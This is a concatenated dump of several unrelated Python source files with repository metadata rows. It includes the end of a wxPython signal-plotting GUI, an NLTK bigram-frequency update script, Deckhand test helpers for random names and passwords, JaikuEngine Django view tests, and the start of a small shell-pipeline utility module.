def OnCommand(self,event):
try:
exec(event.GetString())
except:
print 'Not a valid command... \n'
self.canvas.draw()
def OnOpenRawFile(self,event):
self.dirname= ''
dlg = wx.FileDialog(self,"Choose Raw Scope CSV File...",self.dirname,"","*.csv",wx.OPEN)
#if ok button clicked, open and read file
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
#call read
spacing = 5
self.x,self.y = read(os.path.join(self.dirname,self.filename),spacing=spacing)
#record original
self.xo = self.x
self.yo = self.y
#plot
self.graph(self.x,self.y)
#self.layout()
dlg.Destroy()
def OnOpenProcFile(self,event):
self.dirname= ''
dlg = wx.FileDialog(self,"Choose 2-column csv file",self.dirname,"","*.csv",wx.OPEN)
#if ok button clicked, open and read file
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
#call read
self.x,self.y = read(os.path.join(self.dirname,self.filename),spacing=0)
#record original (for reset button)
self.xo = self.x
self.yo = self.y
#plot
self.graph(self.x,self.y)
#self.layout()
dlg.Destroy()
#tick boxes
def OnClear(self,event):
self.holdgraph= not(bool(event.Checked()))
print self.holdgraph
#plot graph, labels, sizes
def graph(self,x,y):
if not self.holdgraph:
pylab.cla()
self.ax.set_autoscale_on(True)
self.plotline, = self.ax.plot(array(x),y,lw=2.0)
self.canvas.draw()
def graph_update(self,x,y):
self.plotline.set_data(x,y)
self.canvas.draw()
def xtext(self,event):
self.xlabel=event.GetString()
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def ytext(self,event):
self.ylabel=event.GetString()
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
def xchange(self,event):
self.xlabel=event.GetString()
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def ychange(self,event):
self.ylabel=event.GetString()
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
def OnXfs(self,event):
self.xsize=int(event.GetString())
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def OnYfs(self,event):
self.ysize=int(event.GetString())
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
#scales
def XScaleCtrl(self,event):
self.Xscale = float(event.GetString())
def OnXscale(self,event):
self.x = self.x * self.Xscale
self.graph_update(self.x,self.y)
self.ax.set_xlim(self.ax.get_xlim()[0]*self.Xscale,
self.ax.get_xlim()[1]*self.Xscale)
self.canvas.draw()
def YScaleCtrl(self,event):
self.Yscale = float(event.GetString())
def OnYscale(self,event):
self.y = self.y * self.Yscale
self.graph_update(self.x,self.y)
self.ax.set_ylim(self.ax.get_ylim()[0]*self.Yscale,
self.ax.get_ylim()[1]*self.Yscale)
self.canvas.draw()
#normalise
def OnNorm(self,event):
if self.NormType.GetValue()=='Area':
print 'area'
self.Yscale = 1./sum(self.y)
elif self.NormType.GetValue()=='Peak':
print 'peak'
self.Yscale = 1./self.y.max()
self.y = self.y * self.Yscale
self.graph_update(self.x,self.y)
self.ax.set_ylim(self.ax.get_ylim()[0]*self.Yscale,
self.ax.get_ylim()[1]*self.Yscale)
self.canvas.draw()
#log x/y axes
def OnLogX(self,event):
if bool(event.Checked()):
self.ax.set_xscale('log')
else:
self.ax.set_xscale('linear')
self.canvas.draw()
def OnLogY(self,event):
if bool(event.Checked()):
self.ax.set_yscale('log')
else:
self.ax.set_yscale('linear')
self.canvas.draw()
#exit button/menu item
def OnExit(self,event):
self.Destroy()
app.ExitMainLoop()
# Signal processing
def OnSmoothCtrl(self,event):
self.smooth_amount = int(event.GetString())
def OnSmoothBtn(self,event):
self.y = smooth(self.y,self.smooth_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBinCtrl(self,event):
self.bin_amount = int(event.GetString())
def OnBinBtn(self,event):
self.x,self.y,ye = bin(self.x,self.y,self.bin_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnLPCtrl(self,event):
self.LPa = float(event.GetString())
self.LP_amount = self.LPa * self.dd[self.LPm]
print self.LP_amount
def OnHPCtrl(self,event):
self.HPa = float(event.GetString())
self.HP_amount = self.HPa * self.dd[self.HPm]
def OnLPmult(self,event):
self.LPm = self.LPmult.GetValue()
self.LP_amount = self.LPa * self.dd[self.LPm]
def OnHPmult(self,event):
self.HPm = self.HPmult.GetValue()
self.HP_amount = self.HPa * self.dd[self.HPm]
def OnLPBtn(self,event):
print 'Filter freq:',self.LP_amount
self.y = lowpass(self.x,self.y,self.LP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnHPBtn(self,event):
self.y = highpass(self.x,self.y,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBPBtn(self,event):
self.y = bandpass(self.x,self.y,self.LP_amount,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBSBtn(self,event):
self.y = bandstop(self.x,self.y,self.LP_amount,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
###################
#redirect: error messages go to a pop-up box
app = wx.App(redirect=True)
frame = MainWin(None,"Interactive Plotter")
frame.Show()
app.MainLoop()
| mit | 22,884,526,365,834,650 | 29.979975 | 153 | 0.681412 | false |
jiayisuse/cs73 | wp-admin/data_delete.py | 1 | 2483 | #!/usr/bin/env python
import nltk
import os
import sys
import include
title = sys.argv[1].lower()
html = sys.argv[2].lower()
cate_id = sys.argv[3]
def do_read_train(uni_dict, bi_dict, file):
lines = file.readlines()
for line in lines:
words = line.split()
bi_dict[words[0]] = int(words[2])
uni_dict[words[0].split("|")[1]] = int(words[4])
return int(lines[0].split()[-1])
def frequency_update(uni_dict, bi_dict, new_uni_dict, new_bi_dict):
# update uni dict
for token in new_uni_dict.keys():
if uni_dict.has_key(token):
uni_dict[token] -= new_uni_dict[token]
if uni_dict[token] == 0:
del uni_dict[token]
# update bi dict
for key in new_bi_dict:
if bi_dict.has_key(key):
bi_dict[key] -= new_bi_dict[key]
if bi_dict[key] == 0:
del bi_dict[key]
def sort_dict_to(uni_dict, bi_dict, n, sorted_list):
for key in bi_dict:
first = key.split("|")[0]
second = key.split("|")[1]
sorted_list.append([key, float(bi_dict[key]) / uni_dict[second], bi_dict[key], float(uni_dict[second]) / n, uni_dict[second], n])
sorted_list = sorted(sorted_list, key = lambda x: x[4], reverse= True)
text = nltk.clean_html(html)
cate_dir = os.path.join(include.dataset_dir, cate_id)
if not os.access(cate_dir, os.F_OK):
os.makedirs(cate_dir)
file = open(os.path.join(cate_dir, title + ".txt"), "w")
file.write(text)
file.close()
train_file = os.path.join(cate_dir, cate_id + include.bi_train_suffix)
uni_dict = {}
bi_dict = {}
n = 0
try:
with open(train_file, "r") as file:
n = do_read_train(uni_dict, bi_dict, file)
file.close()
except IOError:
pass
tokens = include.my_tokenizer(text)
if "" in tokens:
tokens.remove("")
# read unigram frequency from new post
num_tokens = len(tokens)
new_uni_dict = {}
for token in tokens:
if new_uni_dict.has_key(token):
new_uni_dict[token] += 1
else:
new_uni_dict[token] = 1
# read bigram frequency from new post
new_bi_dict = {}
for i in range(1, len(tokens)):
key = tokens[i] + "|" + tokens[i - 1]
if new_bi_dict.has_key(key):
new_bi_dict[key] += 1
else:
new_bi_dict[key] = 1
frequency_update(uni_dict, bi_dict, new_uni_dict, new_bi_dict)
sorted_list = []
sort_dict_to(uni_dict, bi_dict, n - num_tokens, sorted_list)
file = open(train_file, "w")
file.truncate()
for item in sorted_list:
token = item[0]
bi_p = item[1]
bi_freq = item[2]
uni_p = item[3]
uni_freq = item[4]
nn = item[5]
file.write("%-30s %.8f %6d %16.8f %6s %9d\n" %(token, bi_p, bi_freq, uni_p, uni_freq, nn))
file.close()
| gpl-2.0 | 659,474,404,455,746,600 | 24.864583 | 131 | 0.648409 | false |
att-comdev/deckhand | deckhand/tests/test_utils.py | 1 | 2701 | # Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import string
import uuid
def rand_uuid_hex():
"""Generate a random UUID hex string
:return: a random UUID (e.g. '0b98cf96d90447bda4b46f31aeb1508c')
:rtype: string
"""
return uuid.uuid4().hex
def rand_name(name='', prefix='deckhand'):
"""Generate a random name that includes a random number
:param str name: The name that you want to include
:param str prefix: The prefix that you want to include
:return: a random name. The format is
'<prefix>-<name>-<random number>'.
(e.g. 'prefixfoo-namebar-154876201')
:rtype: string
"""
randbits = str(random.randint(1, 0x7fffffff))
rand_name = randbits
if name:
rand_name = name + '-' + rand_name
if prefix:
rand_name = prefix + '-' + rand_name
return rand_name
def rand_bool():
"""Generate a random boolean value.
:return: a random boolean value.
:rtype: boolean
"""
return random.choice([True, False])
def rand_int(min, max):
"""Generate a random integer value between range (`min`, `max`).
:return: a random integer between the range(`min`, `max`).
:rtype: integer
"""
return random.randint(min, max)
def rand_password(length=15):
"""Generate a random password
:param int length: The length of password that you expect to set
(If it's smaller than 3, it's same as 3.)
:return: a random password. The format is
'<random upper letter>-<random number>-<random special character>
-<random ascii letters or digit characters or special symbols>'
(e.g. 'G2*ac8&lKFFgh%2')
:rtype: string
"""
upper = random.choice(string.ascii_uppercase)
ascii_char = string.ascii_letters
digits = string.digits
digit = random.choice(string.digits)
puncs = '~!@#%^&*_=+'
punc = random.choice(puncs)
seed = ascii_char + digits + puncs
pre = upper + digit + punc
password = pre + ''.join(random.choice(seed) for x in range(length - 3))
return password
| apache-2.0 | -8,100,752,528,894,591,000 | 30.406977 | 78 | 0.647908 | false |
jimpick/jaikuengine | actor/tests.py | 1 | 24011 | # -*- coding: utf-8 -*-
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import Cookie
import logging
import os
import urllib
from django.conf import settings
from django.core import mail
from common.tests import ViewTestCase
from common import api
from common import clean
from common import util
from common.test import util as test_util
class HistoryTest(ViewTestCase):
def test_public_history_when_signed_out(self):
r = self.login_and_get(None, '/user/popular')
self.assertContains(r, "Posts from popular")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertWellformed(r)
def test_private_history_when_signed_out(self):
r = self.login_and_get(None, '/user/girlfriend')
self.assertContains(r, 'private user')
# self.assert_error_contains(r, "Posts from girlfriend", 403)
def test_private_history_when_signed_in_as_contact(self):
r = self.login_and_get('boyfriend', '/user/girlfriend')
self.assertContains(r, "Posts from girlfriend")
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_private_history_when_signed_in_as_noncontact(self):
r = self.login_and_get('annoying', '/user/girlfriend')
self.assertContains(r, 'private user')
# self.assert_error_contains(r, "Posts from girlfriend", 403)
def test_public_history_when_signed_in_as_self(self):
r = self.login_and_get('popular', '/user/popular')
self.assertContains(r, "Your Posts")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertContains(r, 'entry_remove=', 3)
r = self.assertGetLink(r, 'confirm-delete', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular')
self.assertContains(r, 'entry_remove=', 2)
def test_private_history_when_signed_in_as_self(self):
r = self.login_and_get('celebrity', '/user/celebrity')
self.assertContains(r, "Your Posts")
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_wrong_case(self):
r = self.login_and_get(None, '/user/POPular')
self.assertContains(r, "Posts from popular")
self.assertTemplateUsed(r, 'actor/templates/history.html')
self.assertWellformed(r)
def set_presence(self, user, location):
params = {
'nick': '%[email protected]' % user,
'presence_set': '',
'location' : location,
'_nonce': util.create_nonce('%[email protected]' % user,
'presence_set')
}
return self.client.post('/user/popular', params)
def test_presence_self(self):
"""Tests setting and getting presence on the history page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular?flash')
self.assertContains(r, presence)
self.assertContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_presence_loggged_out(self):
# TODO(tyler): currently this doesn't really make you log in, it just
# doesn't save the update
presence = "This is the presence"
user = 'popular'
r = self.set_presence(user, presence)
self.assertNotContains(r, presence)
self.assertNotContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_presence_other(self):
"""Tests setting and getting presence on the history page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
# Retrieve for another user
r = self.login_and_get('unpopular', '/user/popular')
self.assertContains(r, presence)
self.assertTemplateUsed(r, 'actor/templates/history.html')
# Ensure we cannot save the presence
new_presence = 'This is the new presence'
r = self.set_presence(user, new_presence)
self.assertNotContains(r, new_presence)
self.assertNotContains(r, 'Location updated')
class SubscriptionTest(ViewTestCase):
def test_subscribe_and_unsubscribe(self):
r = self.login_and_get('popular', '/user/celebrity')
self.assertContains(r, 'class="subscribe', 2)
r = self.assertGetLink(r, 'subscribe', link_no = 0, of_count = 2)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/celebrity')
self.assertContains(r, 'class="subscribe', 1)
self.assertContains(r, 'class="unsubscribe', 1)
r = self.assertGetLink(r, 'unsubscribe', link_no = 0, of_count = 1)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/celebrity')
self.assertContains(r, 'class="subscribe', 2)
class OverviewTest(ViewTestCase):
def test_public_overview_when_signed_in_as_self(self):
r = self.login_and_get('popular', '/user/popular/overview')
self.assertContains(r, "Hi popular! Here's the latest from your contacts")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_public_overview_when_signed_out(self):
r = self.login_and_get(None, '/user/popular/overview')
# self.assert_error_contains(r, "Not allowed", 403)
def test_private_overview_when_signed_in_as_self(self):
r = self.login_and_get('celebrity', '/user/celebrity/overview')
self.assertContains(r, "Hi celebrity! Here's the latest from your contacts")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_private_overview_when_signed_out(self):
r = self.login_and_get(None, '/user/celebrity/overview')
# self.assert_error_contains(r, "Not allowed", 403)
def set_presence(self, user, location):
params = {
'nick': '%[email protected]' % user,
'presence_set': '',
'location' : location,
'_nonce': util.create_nonce('%[email protected]' % user,
'presence_set')
}
return self.client.post('/user/popular/overview', params)
def test_presence_self(self):
"""Tests setting and getting presence on the overview page"""
presence = "This is the presence"
user = 'popular'
r = self.login(user)
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular/overview?flash')
self.assertContains(r, presence)
self.assertContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_presence_loggged_out(self):
# TODO(tyler): Logged out or another user sends the user to /user/<user>
presence = "This is the presence"
user = 'popular'
r = self.set_presence(user, presence)
r = self.assertRedirectsPrefix(r, '/user/popular')
self.assertNotContains(r, presence)
self.assertNotContains(r, 'Location updated')
self.assertTemplateUsed(r, 'actor/templates/history.html')
def test_overview_with_unconfirmed_email(self):
r = self.login_and_get('hermit', '/user/hermit/overview')
self.assertContains(r, "not yet confirmed")
self.assertTemplateUsed(r, 'actor/templates/overview.html')
class ItemTest(ViewTestCase):
def test_public_item_when_signed_out(self):
r = self.login_and_get(None, '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
# test mark as spam links
self.assertContains(r, 'mark_as_spam', 0)
# test delete links
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 0)
# test that all posts and comments have timestamps
self.assertContains(r, 'ago', 3)
def test_public_item_when_signed_in_as_poster(self):
r = self.login_and_get('popular', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 1)
self.assertContains(r, 'entry_remove=', 1)
self.assertContains(r, 'entry_remove_comment', 2)
def test_public_item_when_signed_in_as_commenter(self):
r = self.login_and_get('unpopular', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 2)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 1)
def test_public_item_when_signed_in_as_nonparticipant(self):
r = self.login_and_get('girlfriend', '/user/popular/presence/12345')
self.assertContains(r, 'test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 3)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 0)
def test_private_item_when_signed_out(self):
r = self.login_and_get(None, '/user/girlfriend/presence/16961')
# self.assert_error_contains(r, 'girlfriend', 403)
def test_private_item_when_signed_in_as_poster(self):
r = self.login_and_get('girlfriend', '/user/girlfriend/presence/16961')
self.assertContains(r, 'private test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 1)
self.assertContains(r, 'entry_remove=', 1)
self.assertContains(r, 'entry_remove_comment', 2)
# test that all posts and comments have timestamps
self.assertContains(r, 'ago', 3)
def test_private_item_when_signed_in_as_commenter(self):
r = self.login_and_get('boyfriend', '/user/girlfriend/presence/16961')
self.assertContains(r, 'private test entry 1')
self.assertTemplateUsed(r, 'actor/templates/item.html')
if settings.MARK_AS_SPAM_ENABLED:
self.assertContains(r, 'mark_as_spam', 2)
self.assertContains(r, 'entry_remove=', 0)
self.assertContains(r, 'entry_remove_comment', 1) # can only delete own comment
self.assertWellformed(r)
def test_entry_remove(self):
item_url = '/user/girlfriend/presence/16961'
r = self.login_and_get('girlfriend', item_url)
r = self.assertGetLink(r, 'confirm-delete', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get(item_url)
self.assertEqual(r.status_code, 404, r.content)
def test_entry_remove_comment(self):
item_url = '/user/girlfriend/presence/16961'
r = self.login_and_get('girlfriend', item_url)
r = self.assertGetLink(r, 'confirm-delete', link_no = 1, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get(item_url)
self.assertContains(r, 'entry_remove_comment', 1)
class CommentTest(ViewTestCase):
entry = 'stream/[email protected]/presence/12345'
def test_email_notification(self):
r = self.login('hermit')
content = 'TEST COMMENT'
params = {'entry_add_comment': '',
'nick': '[email protected]',
'stream': 'stream/[email protected]/presence',
'entry': self.entry,
'content': content,
'_nonce': util.create_nonce('[email protected]',
'entry_add_comment')
}
r = self.client.post('/user/popular/presence/12345',
params)
self.exhaust_queue_any()
self.assertEqual(len(mail.outbox), 2)
for email in mail.outbox:
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertContains(r, content)
self.assertTemplateUsed(r, 'actor/templates/item.html')
def test_email_notification_entities(self):
r = self.login('hermit')
content = 'TEST COMMENT single quote \' ç'
params = {'entry_add_comment': '',
'nick': '[email protected]',
'stream': 'stream/[email protected]/presence',
'entry': self.entry,
'content': content,
'_nonce': util.create_nonce('[email protected]',
'entry_add_comment')
}
r = self.client.post('/user/popular/presence/12345',
params)
self.exhaust_queue_any()
self.assertEqual(len(mail.outbox), 2)
for email in mail.outbox:
msg = email.message()
self.assertEqual(msg.get_charset(), 'utf-8')
self.assertEqual(-1, email.body.find('''))
class ContactsTest(ViewTestCase):
def test_contacts_when_signed_in(self):
r = self.login_and_get('popular', '/user/popular/contacts')
self.assertContains(r, 'Your contacts')
self.assertTemplateUsed(r, 'actor/templates/contacts.html')
self.assertContains(r, 'class="remove', 2)
r = self.assertGetLink(r, 'remove', link_no = 0, of_count = 2)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular/contacts')
self.assertContains(r, 'class="remove', 1)
def test_followers_when_signed_in(self):
r = self.login_and_get('popular', '/user/popular/followers')
self.assertContains(r, 'Your followers')
self.assertTemplateUsed(r, 'actor/templates/followers.html')
self.assertContains(r, 'class="add', 3)
r = self.assertGetLink(r, 'add', link_no = 0, of_count = 3)
self.assertEqual(r.status_code, 302, r.content)
r = self.client.get('/user/popular/contacts')
self.assertContains(r, 'class="remove', 3)
def test_invite_friends_link_presence(self):
r = self.client.get('/user/popular/contacts')
self.assertNotContains(r, 'Invite friends')
r = self.login_and_get('popular', '/user/popular/contacts')
self.assertContains(r, 'Invite friends')
self.logout()
r = self.client.get('/user/popular/contacts')
self.assertNotContains(r, 'Invite friends')
def test_email_notification(self):
# new follower
r = self.login('hermit')
params = {'actor_add_contact': '',
'owner': '[email protected]',
'target': '[email protected]',
'_nonce': util.create_nonce('[email protected]',
'actor_add_contact')
}
r = self.client.post('/user/popular', params)
self.assertEqual(len(mail.outbox), 1, 'new follower')
email = mail.outbox[0]
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertTemplateUsed(r, 'actor/templates/history.html')
mail.outbox = []
# new follower mutual
r = self.login('popular')
params = {'actor_add_contact': '',
'owner': '[email protected]',
'target': '[email protected]',
'_nonce': util.create_nonce('[email protected]',
'actor_add_contact')
}
r = self.client.post('/user/unpopular', params)
self.assertEqual(len(mail.outbox), 1, 'new follower mutual')
email = mail.outbox[0]
# test that the link is valid
url = test_util.get_relative_url(email.body)
r = self.client.get(url)
self.assertTemplateUsed(r, 'actor/templates/history.html')
class SettingsTest(ViewTestCase):
def test_settings_404(self):
r = self.login_and_get('popular', '/user/popular/settings/NonExist')
self.assertContains(r, 'Page not found', status_code=404)
def test_settings_index(self):
r = self.login_and_get('popular', '/user/popular/settings')
self.assertContains(r, 'Settings')
self.assertTemplateUsed(r, 'actor/templates/settings_index.html')
def test_settings_profile(self):
r = self.login_and_get('popular', '/user/popular/settings/profile')
self.assertContains(r, 'Profile')
self.assertTemplateUsed(r, 'actor/templates/settings_profile.html')
def test_settings_mobile(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/mobile')
self.assertContains(r, 'Mobile')
self.assertTemplateUsed(r, 'actor/templates/settings_mobile.html')
def test_settings_email(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/email')
self.assertContains(r, 'Email')
self.assertTemplateUsed(r, 'actor/templates/settings_email.html')
def test_settings_im(self):
# add tests for activate/confirm
r = self.login_and_get('popular', '/user/popular/settings/im')
self.assertContains(r, 'IM')
self.assertTemplateUsed(r, 'actor/templates/settings_im.html')
def test_settings_password(self):
r = self.login_and_get('popular', '/user/popular/settings/password')
self.assertContains(r, 'Change Your Password')
self.assertTemplateUsed(r, 'actor/templates/settings_password.html')
def test_settings_photo(self):
r = self.login_and_get('popular', '/user/popular/settings/photo')
self.assertContains(r, 'Your photo')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
def test_settings_delete(self):
r = self.login_and_get(
'popular',
'/user/popular/settings/delete',
{
'_nonce' : util.create_nonce('popular', 'actor_remove'),
'actor_remove' : '',
'nick' : 'popular',
},
)
r = self.assertRedirectsPrefix(r, '/logout')
# TODO(tyler): Add a test that the user cannot log back in!
def test_settings_upload_avatar(self):
nick = 'obligated'
self.login(nick)
nick = clean.nick(nick)
old_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick)
contacts = api.actor_get_contacts(api.ROOT, nick)
self.assertEquals(len(old_contact_avatars), len(contacts) + 1)
old_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
start_time = api.utcnow()
no_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick,
since_time=start_time)
self.assertEquals(len(no_contact_avatars), 0)
# TODO(teemu): add more tests for different file types (gif and jpg).
# Alternatively, test those against api.avatar_upload.
f = open('testdata/test_avatar.jpg')
r = self.client.post('/user/obligated/settings/photo',
{
'imgfile': f,
'_nonce' :
util.create_nonce('obligated', 'change_photo'),
})
r = self.assertRedirectsPrefix(r, '/user/obligated/settings/photo')
actor_ref = api.actor_get(api.ROOT, nick)
new_avatar = actor_ref.extra.get('icon', 'avatar_default')
self.assertNotEquals(old_avatar, new_avatar)
self.assertTrue(actor_ref.avatar_updated_at >= start_time)
new_contact_avatars = api.actor_get_contacts_avatars_since(api.ROOT, nick,
since_time=start_time)
self.assertEquals(len(new_contact_avatars), 1)
self.assertEquals(new_contact_avatars.pop().nick, nick)
self.assertContains(r, 'Avatar uploaded')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_settings_change_avatar(self):
nick = 'obligated'
self.login(nick)
nick = clean.nick(nick)
old_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
# TODO(teemu): add more tests for different file types (gif and jpg).
# Alternatively, test those against api.avatar_upload.
r = self.client.post('/user/obligated/settings/photo',
{
'avatar': 'default/animal_9',
'_nonce' :
util.create_nonce('obligated', 'change_photo'),
})
r = self.assertRedirectsPrefix(r, '/user/obligated/settings/photo')
new_avatar = api.actor_get(api.ROOT, nick).extra.get('icon',
'avatar_default')
self.assertNotEquals(old_avatar, new_avatar)
self.assertContains(r, 'Avatar changed')
self.assertTemplateUsed(r, 'actor/templates/settings_photo.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_settings_privacy(self):
r = self.login_and_get('popular', '/user/popular/settings/privacy')
self.assertContains(r, 'Privacy')
self.assertTemplateUsed(r, 'actor/templates/settings_privacy.html')
def test_settings_design(self):
r = self.login_and_get('popular', '/user/popular/settings/design')
self.assertContains(r, 'Change Design')
self.assertTemplateUsed(r, 'actor/templates/settings_design.html')
def test_settings_badge(self):
r = self.login_and_get('popular', '/user/popular/settings/badge')
self.assertContains(r, 'badge')
self.assertTemplateUsed(r, 'actor/templates/settings_badge.html')
def test_settings_notifications(self):
r = self.login_and_get('popular', '/user/popular/settings/notifications')
self.assertContains(r, 'notifications')
self.assertTemplateUsed(r, 'actor/templates/settings_notifications.html')
def test_settings_webfeeds(self):
r = self.login_and_get('popular', '/user/popular/settings/feeds')
self.assertContains(r, 'feeds')
self.assertTemplateUsed(r, 'actor/templates/settings_feeds.html')
class NewUserTest(ViewTestCase):
def test_pages_as_newuser(self):
api.user_create(api.ROOT, nick = 'mmmm', password = 'mmmmmm',
first_name = 'm',
last_name ='m')
for page in ('/user/root',
'/user/mmmm/overview',
'/user/mmmm/contacts',
'/user/mmmm/followers',
'/user/mmmm',
'/channel/popular',
'/channel/popular/presence/13345'):
r = self.login_and_get('mmmm', page, password='mmmmmm')
self.assertEqual(r.status_code, 200, page + ' failed:' +
str(r.status_code))
class PostTest(ViewTestCase):
def test_post_message_in_overview(self):
self.login('popular')
msg = 'a post from unit test'
r = self.client.post('/user/popular/overview',
{'message': msg,
'_nonce': util.create_nonce('popular', 'post'),
'nick': '[email protected]',
'post': '',
})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertContains(r, msg)
self.assertContains(r, 'a moment ago')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
def test_post_message_in_personal_history(self):
self.login('popular')
msg = 'a post from unit test'
r = self.client.post('/user/popular',
{'message': msg,
'_nonce': util.create_nonce('popular', 'post'),
'nick': '[email protected]',
'post': '',
})
r = self.assertRedirectsPrefix(r, '/user/popular')
self.assertContains(r, msg)
self.assertContains(r, 'a moment ago')
self.assertTemplateUsed(r, 'actor/templates/history.html')
| apache-2.0 | -7,610,653,294,364,199,000 | 39.694915 | 85 | 0.643815 | false |
thebjorn/dkcoverage | dkcoverage/shell.py | 1 | 4111 | # -*- coding: utf-8 -*-
"""Utility functions for shell-like programming::
for line in run('cat foo') | grep('hello'):
print line
New 'commands' only need to have a feed(lines) method that should return
a Lines instance.
"""
# pylint:disable=R0903,R0201
# R0903: Too few public methods
# R0201: method could be a function
import re
import shlex
import pprint
from subprocess import Popen, PIPE
def runcmd(cmd, *args):
"helper function to grab output of a shell command."
if args:
cmd = cmd + ' ' + ' '.join(args)
output = Popen(shlex.split(cmd), stdout=PIPE).communicate()[0]
return output.splitlines()
def _grep(pattern, lines):
"return the lines that match pattern."
return [line for line in lines if re.search(pattern, line)]
def extract_line(pattern, lines):
"return first line that matches pattern."
return _grep(pattern, lines)[0]
def _split(lines):
"Split each line into columns."
return [line.split() for line in lines]
def _field(n, lines):
"Return the nth column."
return [cols[n] for cols in _split(lines)]
class Lines(object):
"Pipe contents."
def __init__(self, lines):
self.lines = lines
def __nonzero__(self):
return bool(self.lines)
def __len__(self):
return len(self.lines)
def __repr__(self):
return pprint.pformat(self.lines)
__str__ = __repr__
def __iter__(self):
return iter(self.lines)
def __or__(self, nextcmd):
return nextcmd.feed(self.lines)
def __getitem__(self, key):
return self.lines[key]
def run(cmd, *args, **kw):
"Convenience function to get runcmd output into pipeable format."
if kw.get('verbose'):
print cmd,
if args:
print args
else:
print
return Lines(runcmd(cmd, *args))
class Sort(object):
"similar to unix sort command."
def feed(self, lines):
"sort lines"
return Lines(sorted(lines))
sort = Sort()
class grep(object):
"similar to unix grep command."
def __init__(self, pattern):
self.pattern = pattern
def feed(self, lines):
"get input from pipe"
